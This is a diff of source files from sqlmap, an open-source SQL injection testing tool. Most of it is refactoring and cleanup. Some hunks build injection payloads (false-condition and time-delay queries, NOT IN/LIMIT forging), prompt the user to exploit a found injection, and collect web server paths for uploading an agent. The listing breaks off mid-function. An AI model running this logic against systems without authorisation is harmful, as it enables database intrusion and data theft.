@@ -83,7 +81,6 @@ def __selectInjection(injData):
 
     return injData[index]
 
-
 def start():
     """
     This function calls a function that performs checks on both URL
@@ -137,12 +134,14 @@ def start():
             logMsg = "testing url %s" % targetUrl
             logger.info(logMsg)
 
+        parseTargetUrl()
         createTargetDirs()
         initTargetEnv()
 
         if not checkConnection() or not checkString() or not checkRegexp():
             continue
 
+        if not conf.dropSetCookie:
             for _, cookie in enumerate(conf.cj):
                 cookie = str(cookie)
                 index  = cookie.index(" for ")
@@ -165,7 +164,7 @@ def start():
     
                 if setCookieAsInjectable:
                     conf.httpHeaders.append(("Cookie", cookieStr))
-                conf.parameters["Cookie"] = cookieStr.replace("%", "%%")
+                    conf.parameters["Cookie"] = cookieStr
                     __paramDict = paramToDict("Cookie", cookieStr)
     
                     if __paramDict:
@@ -201,7 +200,7 @@ def start():
                         logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                         logger.info(logMsg)
 
-                    if testSqlInj == True:
+                    if testSqlInj:
                         for parenthesis in range(0, 4):
                             logMsg  = "testing sql injection on %s " % place
                             logMsg += "parameter '%s' with " % parameter
@@ -247,14 +246,11 @@ def start():
         if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
             raise sqlmapNotVulnerableException, "all parameters are not injectable"
         elif kb.injPlace and kb.injParameter and kb.injType:
-            condition = False
-
             if conf.multipleTargets:
                 message = "do you want to exploit this SQL injection? [Y/n] "
                 exploit = readInput(message, default="Y")
 
-                if not exploit or exploit[0] in ("y", "Y"):
+                condition = not exploit or exploit[0] in ("y", "Y")
-                    condition = True
             else:
                 condition = True
 

lib/controller/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -37,7 +35,6 @@ from plugins.dbms.mysql import MySQLMap
 from plugins.dbms.oracle import OracleMap
 from plugins.dbms.postgresql import PostgreSQLMap
 
-
 def setHandler():
     """
     Detect which is the target web application back-end database

lib/core/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/agent.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,12 +22,11 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import queries
@@ -45,7 +44,6 @@ class Agent:
         temp.start     = randomStr(6)
         temp.stop      = randomStr(6)
 
-
     def payload(self, place=None, parameter=None, value=None, newValue=None, negative=False, falseCond=False):
         """
         This method replaces the affected parameter with the SQL
@@ -55,10 +53,11 @@ class Agent:
         falseValue = ""
         negValue   = ""
         retValue   = ""
+        newValue   = urlencode(newValue)
 
-        if negative == True or conf.paramNegative == True:
+        if negative or conf.paramNegative:
             negValue = "-"
-        elif falseCond == True or conf.paramFalseCond == True:
+        elif falseCond or conf.paramFalseCond:
             randInt = randomInt()
             falseValue = " AND %d=%d" % (randInt, randInt + 1)
 
@@ -83,7 +82,6 @@ class Agent:
 
         return retValue
 
-
     def fullPayload(self, query):
         query   = self.prefixQuery(query)
         query   = self.postfixQuery(query)
@@ -91,7 +89,6 @@ class Agent:
 
         return payload
 
-
     def prefixQuery(self, string):
         """
         This method defines how the input string has to be escaped
@@ -120,7 +117,6 @@ class Agent:
 
         return query
 
-
     def postfixQuery(self, string, comment=None):
         """
         This method appends the DBMS comment to the
@@ -136,7 +132,7 @@ class Agent:
         if conf.postfix:
             string += " %s" % conf.postfix
         else:
-            if kb.parenthesis != None:
+            if kb.parenthesis is not None:
                 string += " AND %s" % ("(" * kb.parenthesis)
             else:
                 raise sqlmapNoneDataException, "unable to get the number of parenthesis"
@@ -156,7 +152,6 @@ class Agent:
 
         return string
 
-
     def nullAndCastField(self, field):
         """
         Take in input a field string and return its processed nulled and
@@ -195,7 +190,6 @@ class Agent:
 
         return nulledCastedField
 
-
     def nullCastConcatFields(self, fields):
         """
         Take in input a sequence of fields string and return its processed
@@ -242,7 +236,6 @@ class Agent:
 
         return nulledCastedConcatFields
 
-
     def getFields(self, query):
         """
         Take in input a query string and return its fields (columns) and
@@ -285,7 +278,6 @@ class Agent:
 
         return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, fieldsToCastList, fieldsToCastStr
 
-
     def simpleConcatQuery(self, query1, query2):
         concatenatedQuery = ""
 
@@ -300,7 +292,6 @@ class Agent:
 
         return concatenatedQuery
 
-
     def concatQuery(self, query, unpack=True):
         """
         Take in input a query string and return its processed nulled,
@@ -327,7 +318,7 @@ class Agent:
         @rtype: C{str}
         """
 
-        if unpack == True:
+        if unpack:
             concatenatedQuery = ""
             query             = query.replace(", ", ",")
 
@@ -386,7 +377,6 @@ class Agent:
 
         return concatenatedQuery
 
-
     def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL"):
         """
         Take in input an query (pseudo query) string and return its
@@ -465,8 +455,7 @@ class Agent:
 
         return inbandQuery
 
-
+    def limitQuery(self, num, query, field=None):
-    def limitQuery(self, num, query, field):
         """
         Take in input a query string and return its limited query string.
 
@@ -515,6 +504,12 @@ class Agent:
             if " ORDER BY " in limitedQuery:
                 limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
 
+            notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
+
+            for notDistinct in notDistincts:
+                limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
+                limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
+
             if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
                 topNums         = re.search(queries[kb.dbms].limitregexp, limitedQuery, re.I)
 
@@ -529,18 +524,19 @@ class Agent:
                     topNum          = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
                     limitedQuery    = limitedQuery.replace("TOP %s " % topNum, "")
 
-            if forgeNotIn == True:
+            if forgeNotIn:
                 limitedQuery = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
+
                 if " WHERE " in limitedQuery:
                     limitedQuery  = "%s AND %s " % (limitedQuery, field)
                 else:
                     limitedQuery  = "%s WHERE %s " % (limitedQuery, field)
+
                 limitedQuery += "NOT IN (%s" % (limitStr % num)
                 limitedQuery += "%s %s)" % (field, fromFrom)
 
         return limitedQuery
 
-
     def forgeCaseStatement(self, expression):
         """
         Take in input a query string and return its CASE statement query
@@ -560,6 +556,5 @@ class Agent:
 
         return queries[kb.dbms].case % expression
 
-
 # SQL agent
 agent = Agent()

lib/core/common.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 import random
 import re
@@ -32,22 +30,30 @@ import string
 import sys
 import time
 import urlparse
+import ntpath
+import posixpath
 
+from tempfile import NamedTemporaryFile
+from tempfile import mkstemp
 
+from extra.cloak.cloak import decloak
 from lib.contrib import magic
-from lib.core.convert import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.data import queries
 from lib.core.data import temp
+from lib.core.convert import urlencode
 from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapSyntaxException
+from lib.core.settings import DESCRIPTION
 from lib.core.settings import IS_WIN
+from lib.core.settings import SITE
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.settings import VERSION_STRING
 
-
 def paramToDict(place, parameters=None):
     """
     Split the parameters into names and values, check if these parameters
@@ -115,7 +121,6 @@ def paramToDict(place, parameters=None):
 
     return testableParameters
 
-
 def formatDBMSfp(versions=None):
     """
     This function format the back-end DBMS fingerprint value and return its
@@ -125,7 +130,7 @@ def formatDBMSfp(versions=None):
     @rtype: C{str}
     """
 
-    if not versions:
+    if not versions or versions == [None]:
         versions = kb.dbmsVersion
 
     if isinstance(versions, str):
@@ -139,13 +144,11 @@ def formatDBMSfp(versions=None):
 
         return kb.dbms
 
-
 def formatFingerprintString(values, chain=" or "):
     strJoin = "|".join([v for v in values])
 
     return strJoin.replace("|", chain)
 
-
 def formatFingerprint(target, info):
     """
     This function format the back-end operating system fingerprint value
@@ -198,7 +201,6 @@ def formatFingerprint(target, info):
 
     return infoStr
 
-
 def getHtmlErrorFp():
     """
     This function parses the knowledge base htmlFp list and return its
@@ -222,33 +224,41 @@ def getHtmlErrorFp():
 
     return htmlParsed
 
-
+def getDocRoot(webApi=None):
-def getDocRoot():
     docRoot = None
-    pagePath = os.path.dirname(conf.path)
+    pagePath = directoryPath(conf.path)
 
     if kb.os == "Windows":
+        if webApi == "php":
+            defaultDocRoot = "C:/xampp/htdocs/"
+        else:
             defaultDocRoot = "C:/Inetpub/wwwroot/"
     else:
         defaultDocRoot = "/var/www/"
 
     if kb.absFilePaths:
         for absFilePath in kb.absFilePaths:
+            if directoryPath(absFilePath) == '/':
+                continue
+            absFilePath = normalizePath(absFilePath)
             absFilePathWin = None
 
-            if re.search("([\w]\:[\/\\\\]+)", absFilePath):
+            if isWindowsPath(absFilePath):
-                absFilePathWin = absFilePath
+                absFilePathWin = posixToNtSlashes(absFilePath)
-                absFilePath    = absFilePath[2:].replace("\\", "/")
+                absFilePath    = ntToPosixSlashes(absFilePath[2:])
-
-            absFilePath = os.path.normpath(absFilePath)
             
             if pagePath in absFilePath:
                 index   = absFilePath.index(pagePath)
                 docRoot = absFilePath[:index]
 
-                if absFilePathWin:
+                if len(docRoot) == 0:
-                    docRoot = "C:/%s" % docRoot.replace("\\", "/")
+                    docRoot = None
+                    continue
 
+                if absFilePathWin:
+                    docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
+                    
+                docRoot = normalizePath(docRoot)
                 break
 
     if docRoot:
@@ -269,14 +279,16 @@ def getDocRoot():
 
     return docRoot
 
-
+def getDirs(webApi=None):
-def getDirs():
     directories = set()
 
     if kb.os == "Windows":
-        defaultDir = "C:/Inetpub/wwwroot/test/"
+        if webApi == "php":
+            defaultDirs = ["C:/xampp/htdocs/"]
         else:
-        defaultDir = "/var/www/test/"
+            defaultDirs = ["C:/Inetpub/wwwroot/"]
+    else:
+        defaultDirs = ["/var/www/"]
 
     if kb.absFilePaths:
         infoMsg  = "retrieved web server full paths: "
@@ -285,14 +297,19 @@ def getDirs():
         
         for absFilePath in kb.absFilePaths:
             if absFilePath:
-                directories.add(os.path.dirname(absFilePath))
+                directory = directoryPath(absFilePath)
+                if isWindowsPath(directory):
+                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
+                directories.add(directory)
     else:
         warnMsg = "unable to retrieve any web server path"
         logger.warn(warnMsg)
 
     message   = "please provide any additional web server full path to try "
-    message  += "to upload the agent [%s]: " % defaultDir
+    message  += "to upload the agent [%s]: " % ",".join(directory for directory in defaultDirs)
-    inputDirs = readInput(message, default=defaultDir)
+    inputDirs = readInput(message, default=",".join(directory for directory in defaultDirs))
 
     if inputDirs:
         inputDirs = inputDirs.replace(", ", ",")
@@ -302,23 +319,20 @@ def getDirs():
             if inputDir:
                 directories.add(inputDir)
     else:
-        directories.add(defaultDir)
+        [directories.add(directory) for directory in defaultDirs]
 
     return directories
     
-
 def filePathToString(filePath):
     strRepl = filePath.replace("/", "_").replace("\\", "_")
     strRepl = strRepl.replace(" ", "_").replace(":", "_")
 
     return strRepl
 
-
 def dataToStdout(data):
     sys.stdout.write(data)
     sys.stdout.flush()
     
-
 def dataToSessionFile(data):
     if not conf.sessionFile:
         return
@@ -326,12 +340,10 @@ def dataToSessionFile(data):
     conf.sessionFP.write(data)
     conf.sessionFP.flush()
     
-
 def dataToDumpFile(dumpFile, data):
     dumpFile.write(data)
     dumpFile.flush()
     
-
 def dataToOutFile(data):
     if not data:
         return "No data retrieved"
@@ -346,7 +358,6 @@ def dataToOutFile(data):
 
     return rFilePath
 
-
 def strToHex(inpStr):
     """
     @param inpStr: inpStr to be converted into its hexadecimal value.
@@ -370,7 +381,6 @@ def strToHex(inpStr):
 
     return hexStr
         
-
 def fileToStr(fileName):
     """
     @param fileName: file path to read the content and return as a no
@@ -384,13 +394,7 @@ def fileToStr(fileName):
     filePointer = open(fileName, "r")
     fileText = filePointer.read()
 
-    fileText = fileText.replace("    ", "")
+    return fileText.replace("    ", "").replace("\t", "").replace("\r", "").replace("\n", " ")
-    fileText = fileText.replace("\t", "")
-    fileText = fileText.replace("\r", "")
-    fileText = fileText.replace("\n", " ")
-
-    return fileText
-
 
 def fileToHex(fileName):
     """
@@ -407,7 +411,6 @@ def fileToHex(fileName):
 
     return hexFile
 
-
 def readInput(message, default=None):
     """
     @param message: message to display on terminal.
@@ -436,7 +439,6 @@ def readInput(message, default=None):
 
     return data
         
-
 def randomRange(start=0, stop=1000):
     """
     @param start: starting number.
@@ -451,7 +453,6 @@ def randomRange(start=0, stop=1000):
 
     return int(random.randint(start, stop))
 
-
 def randomInt(length=4):
     """
     @param length: length of the random string.
@@ -463,8 +464,7 @@ def randomInt(length=4):
 
     return int("".join([random.choice(string.digits) for _ in xrange(0, length)]))
 
-
+def randomStr(length=4, lowercase=False):
-def randomStr(length=5, lowercase=False):
     """
     @param length: length of the random string.
     @type length: C{int}
@@ -473,14 +473,13 @@ def randomStr(length=5, lowercase=False):
     @rtype: C{str}
     """
 
-    if lowercase == True:
+    if lowercase:
         rndStr = "".join([random.choice(string.lowercase) for _ in xrange(0, length)])
     else:
         rndStr = "".join([random.choice(string.letters) for _ in xrange(0, length)])
 
     return rndStr
     
-
 def sanitizeStr(inpStr):
     """
     @param inpStr: inpStr to sanitize: cast to str datatype and replace
@@ -496,7 +495,6 @@ def sanitizeStr(inpStr):
 
     return cleanString
 
-
 def checkFile(filename):
     """
     @param filename: filename to check if it exists.
@@ -506,24 +504,21 @@ def checkFile(filename):
     if not os.path.exists(filename):
         raise sqlmapFilePathException, "unable to read file '%s'" % filename
     
-
 def replaceNewlineTabs(inpStr):
     replacedString = inpStr.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
     replacedString = replacedString.replace(temp.delimiter, "__DEL__")
 
     return replacedString
 
-
 def banner():
     """
     This function prints sqlmap banner with its version
     """
 
     print """
+    %s - %s
     %s
-    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
+    """ % (VERSION_STRING, DESCRIPTION, SITE)
-    """ % VERSION_STRING
-
     
 def parsePasswordHash(password):
     blank = " " * 8
@@ -543,7 +538,6 @@ def parsePasswordHash(password):
 
     return password
 
-
 def cleanQuery(query):
     upperQuery = query
 
@@ -557,7 +551,6 @@ def cleanQuery(query):
 
     return upperQuery
             
-
 def setPaths():
     # sqlmap paths
     paths.SQLMAP_CONTRIB_PATH    = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "contrib")
@@ -574,6 +567,7 @@ def setPaths():
     paths.SQLMAP_HISTORY         = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
     paths.SQLMAP_CONFIG          = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.FUZZ_VECTORS           = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
+    paths.DETECTION_RULES_XML    = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
     paths.ERRORS_XML             = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
     paths.QUERIES_XML            = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
     paths.GENERIC_XML            = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
@@ -582,7 +576,6 @@ def setPaths():
     paths.ORACLE_XML             = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
     paths.PGSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
     
-
 def weAreFrozen():
     """
     Returns whether we are frozen via py2exe.
@@ -592,7 +585,6 @@ def weAreFrozen():
 
     return hasattr(sys, "frozen")
 
-
 def parseTargetUrl():
     """
     Parse target url and set some attributes into the configuration
@@ -616,18 +608,21 @@ def parseTargetUrl():
     conf.hostname  = __hostnamePort[0]
 
     if len(__hostnamePort) == 2:
+        try:
             conf.port = int(__hostnamePort[1])
+        except:
+            errMsg = "invalid target url"
+            raise sqlmapSyntaxException, errMsg
     elif conf.scheme == "https":
         conf.port = 443
     else:
         conf.port = 80
 
     if __urlSplit[3]:
-        conf.parameters["GET"] = urldecode(__urlSplit[3]).replace("%", "%%")
+        conf.parameters["GET"] = __urlSplit[3]
 
     conf.url = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, conf.path)
     
-
 def expandAsteriskForColumns(expression):
     # If the user provided an asterisk rather than the column(s)
     # name, sqlmap will retrieve the columns itself and reprocess
@@ -660,7 +655,6 @@ def expandAsteriskForColumns(expression):
 
     return expression
 
-
 def getRange(count, dump=False, plusOne=False):
     count      = int(count)
     indexRange = None
@@ -674,14 +668,13 @@ def getRange(count, dump=False, plusOne=False):
         if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
             limitStart = conf.limitStart
 
-    if kb.dbms == "Oracle" or plusOne == True:
+    if plusOne:
         indexRange = range(limitStart, limitStop + 1)
     else:
         indexRange = range(limitStart - 1, limitStop)
 
     return indexRange
     
-
 def parseUnionPage(output, expression, partial=False, condition=None, sort=True):
     data = []
 
@@ -696,7 +689,7 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
 
         output = re.findall(regExpr, output, re.S)
 
-        if condition == None:
+        if condition is None:
             condition = (
                           kb.resumedQueries and conf.url in kb.resumedQueries.keys()
                           and expression in kb.resumedQueries[conf.url].keys()
@@ -732,8 +725,7 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)
 
     return data
 
-
+def getDelayQuery(andCond=False):
-def getDelayQuery():
     query = None
 
     if kb.dbms in ("MySQL", "PostgreSQL"):
@@ -744,6 +736,10 @@ def getDelayQuery():
 
         if (kb.dbms == "MySQL" and banVer >= "5.0.12") or (kb.dbms == "PostgreSQL" and banVer >= "8.2"):
             query = queries[kb.dbms].timedelay % conf.timeSec
+
+            if kb.dbms == "MySQL" and andCond:
+                query = query.replace("SELECT ", "")
+
         else:
             query = queries[kb.dbms].timedelay2 % conf.timeSec
     else:
@@ -751,7 +747,6 @@ def getDelayQuery():
 
     return query
     
-
 def getLocalIP():
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((conf.hostname, conf.port))
@@ -760,11 +755,9 @@ def getLocalIP():
 
     return ip
 
-
 def getRemoteIP():
     return socket.gethostbyname(conf.hostname)
 
-
 def getFileType(filePath):
     try:
         magicFileType = magic.from_file(filePath)
@@ -776,7 +769,6 @@ def getFileType(filePath):
     else:
         return "binary"
     
-
 def pollProcess(process):
     while True:
         dataToStdout(".")
@@ -794,11 +786,10 @@ def pollProcess(process):
 
             break
             
-
 def getCharset(charsetType=None):
     asciiTbl = []
 
-    if charsetType == None:
+    if charsetType is None:
         asciiTbl = range(0, 128)
 
     # 0 or 1
@@ -833,12 +824,11 @@ def getCharset(charsetType=None):
 
     return asciiTbl
     
-
 def searchEnvPath(fileName):
     envPaths = os.environ["PATH"]
     result = None
 
-    if IS_WIN is True:
+    if IS_WIN:
         envPaths = envPaths.split(";")
     else:
         envPaths = envPaths.split(":")
@@ -847,7 +837,108 @@ def searchEnvPath(fileName):
         envPath = envPath.replace(";", "")
         result = os.path.exists(os.path.normpath(os.path.join(envPath, fileName)))
 
-        if result == True:
+        if result:
             break
 
     return result
+
+def urlEncodeCookieValues(cookieStr):
+    if cookieStr:
+        result = ""
+        for part in cookieStr.split(';'):
+            index = part.find('=') + 1
+            if index > 0:
+                name = part[:index - 1].strip()
+                value = urlencode(part[index:], convall=True)
+                result += "; %s=%s" % (name, value)
+            elif part.strip().lower() != "secure":
+                result += "%s%s" % ("%3B", urlencode(part, convall=True))
+            else:
+                result += "; secure"
+        if result.startswith('; '):
+            result = result[2:]
+        elif result.startswith('%3B'):
+            result = result[3:]
+        return result
+    else:
+        return None
+
+def directoryPath(path):
+    retVal = None
+    if isWindowsPath(path):
+        retVal = ntpath.dirname(path)
+    else:
+        retVal = posixpath.dirname(path)
+    return retVal
+
+def normalizePath(path):
+    """
+    This function must be called only after posixToNtSlashes()
+    and ntToPosixSlashes()
+    """
+
+    retVal = None
+
+    if isWindowsPath(path):
+        retVal = ntpath.normpath(path)
+    else:
+        retVal = posixpath.normpath(path)
+
+    return retVal
+
+def safeStringFormat(formatStr, params):
+    retVal = formatStr.replace('%d', '%s')
+
+    if isinstance(params, str):
+        retVal = retVal.replace("%s", params)
+    else:
+        count = 0
+        index = 0
+
+        while index != -1:
+            index = retVal.find('%s')
+
+            if index != -1:
+                if count < len(params):
+                    retVal = retVal[:index] + str(params[count]) + retVal[index+2:]
+                else:
+                    raise sqlmapNoneDataException, "wrong number of parameters during string formatting"
+                count += 1
+
+    return retVal
+
+def sanitizeAsciiString(string):
+    return "".join(char if ord(char) < 128 else '?' for char in string)
+
+def decloakToNamedTemporaryFile(filepath, name=None):
+    retVal = NamedTemporaryFile()
+    def __del__():
+        try:
+            if hasattr(retVal, 'old_name'):
+                retVal.name = old_name
+            retVal.close()
+        except OSError:
+            pass
+    retVal.__del__ = __del__
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    if name:
+        retVal.old_name = retVal.name
+        retVal.name = name
+    return retVal
+
+def decloakToMkstemp(filepath, **kwargs):
+    name = mkstemp(**kwargs)[1]
+    retVal = open(name, 'w+b')
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    return retVal
+
+def isWindowsPath(filepath):
+    return re.search("\A[\w]\:\\\\", filepath) is not None
+
+def posixToNtSlashes(filepath):
+    return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+    return filepath.replace('\\', '/')

lib/core/convert.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,21 +22,22 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
+try:
+    import hashlib
+except:
     import md5
     import sha
+    
+import sys
 import struct
 import urllib
 
-
 def base64decode(string):
     return string.decode("base64")
 
-
 def base64encode(string):
     return string.encode("base64")[:-1]
 
-
 def hexdecode(string):
     string = string.lower()
 
@@ -45,44 +46,45 @@ def hexdecode(string):
 
     return string.decode("hex")
     
-
 def hexencode(string):
     return string.encode("hex")
 
-
 def md5hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.md5(string).hexdigest()
+    else:
         return md5.new(string).hexdigest()
 
-
 def orddecode(string):
     packedString = struct.pack("!"+"I" * len(string), *string)
     return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])
 
-
 def ordencode(string):
     return tuple([ord(char) for char in string])
 
-
 def sha1hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.sha1(string).hexdigest()
+    else:
         return sha.new(string).hexdigest()
 
-
 def urldecode(string):
-    if not string:
+    result = None
-        return
     
-    doublePercFreeString = string.replace("%%", "__DPERC__")
+    if string:
-    unquotedString = urllib.unquote_plus(doublePercFreeString)
+        result = urllib.unquote_plus(string)
-    unquotedString = unquotedString.replace("__DPERC__", "%%")
-
-    return unquotedString
 
+    return result
 
 def urlencode(string, safe=":/?%&=", convall=False):
-    if not string:
+    result = None
-        return
 
-    if convall == True:
+    if string is None:
-        return urllib.quote(string)
+        return result
+
+    if convall:
+        result = urllib.quote(string)
     else:
-        return urllib.quote(string, safe)
+        result = urllib.quote(string, safe)
+
+    return result

lib/core/data.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.datatype import advancedDict
 from lib.core.settings import LOGGER
 

lib/core/datatype.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,10 +22,8 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
 from lib.core.exception import sqlmapDataException
 
-
 class advancedDict(dict):
     """
     This class defines the sqlmap object, inheriting from Python data
@@ -45,7 +43,6 @@ class advancedDict(dict):
         # After initialisation, setting attributes
         # is the same as setting an item
 
-
     def __getattr__(self, item):
         """
         Maps values to attributes
@@ -57,7 +54,6 @@ class advancedDict(dict):
         except KeyError:
             raise sqlmapDataException, "Unable to access item '%s'" % item
 
-
     def __setattr__(self, item, value):
         """
         Maps attributes to values

lib/core/dump.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,16 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
-import re
 import os
+import re
 
 from lib.core.common import dataToDumpFile
 from lib.core.data import conf
 from lib.core.data import logger
 
-
 class Dump:
     """
     This class defines methods used to parse and output the results
@@ -43,7 +40,6 @@ class Dump:
         self.__outputFile = None
         self.__outputFP   = None
         
-
     def __write(self, data, n=True):
         if n:
             print data
@@ -56,12 +52,10 @@ class Dump:
 
         conf.loggedToOut = True
         
-
     def setOutputFile(self):
         self.__outputFile = "%s%slog" % (conf.outputPath, os.sep)
         self.__outputFP = open(self.__outputFile, "a")
         
-
     def string(self, header, data, sort=True):
         if isinstance(data, (list, tuple, set)):
             self.lister(header, data, sort)
@@ -82,12 +76,11 @@ class Dump:
         else:
             self.__write("%s:\tNone\n" % header)
             
-
     def lister(self, header, elements, sort=True):
         if elements:
             self.__write("%s [%d]:" % (header, len(elements)))
 
-        if sort == True:
+        if sort:
             try:
                 elements = set(elements)
                 elements = list(elements)
@@ -104,7 +97,6 @@ class Dump:
         if elements:
             self.__write("")
             
-
     def userSettings(self, header, userSettings, subHeader):
         self.__areAdmins = set()
 
@@ -132,6 +124,35 @@ class Dump:
                 self.__write("    %s: %s" % (subHeader, setting))
         print
 
+    def dbColumns(self, dbColumns, colConsider, dbs):
+        for column, dbTables in dbColumns.items():
+            if colConsider == "1":
+                colConsiderStr = "s like '" + column + "' were"
+            else:
+                colConsiderStr = " '%s' was" % column
+
+            msg  = "Column%s found in the " % colConsiderStr
+            msg += "following databases:"
+            self.__write(msg)
+
+            printDbs = {}
+
+            for db, tblData in dbs.items():
+                for tbl, colData in tblData.items():
+                    for col, dataType in colData.items():
+                        if column in col:
+                            if db in printDbs:
